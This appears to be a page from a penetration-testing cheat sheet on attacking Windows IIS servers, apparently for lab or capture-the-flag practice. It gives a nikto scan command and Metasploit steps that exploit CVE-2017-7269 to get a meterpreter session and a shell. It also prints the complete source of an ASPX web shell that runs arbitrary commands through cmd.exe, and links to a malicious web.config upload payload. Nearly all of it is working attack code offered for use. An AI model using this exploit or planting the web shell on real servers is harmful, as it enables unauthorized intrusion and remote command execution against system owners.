###
IIS
###

| Windows IIS

| nikto is usefull for IIS servers

.. code-block:: bash

    sudo nikto -host http://IP/

|

CVE-2017-7269
*************

|

.. code-block:: bash

    msfconsole
    msf6 > use iis_webdav_scstoragepathfromurl
    msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.129.210.101
    msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.60
    msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
    meterpreter > shell

|

ASPX WebShell
*************

|

.. code-block:: aspx

  cat <<'EOF'>cmd.aspx
  <%@ Page Language="VB" Debug="true" %>
  <%@ import Namespace="system.IO" %>
  <%@ import Namespace="System.Diagnostics" %>

  <script runat="server">

  Sub RunCmd(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  myProcessStartInfo.UseShellExecute = false
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo
  myProcessStartInfo.Arguments=xcmd.text
  myProcess.Start()

  Dim myStreamReader As StreamReader = myProcess.StandardOutput
  Dim myString As String = myStreamReader.Readtoend()
  myProcess.Close()
  mystring=replace(mystring,"<","&lt;")
  mystring=replace(mystring,">","&gt;")
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"
  End Sub

  </script>

  <html>
  <body>
  <form runat="server">
  <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
  <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
  <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
  <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
  <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
  <p><asp:Label id="result" runat="server"></asp:Label>
  </form>
  </body>
  </html>
  EOF

|

ASPX web.config
***************

| https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config
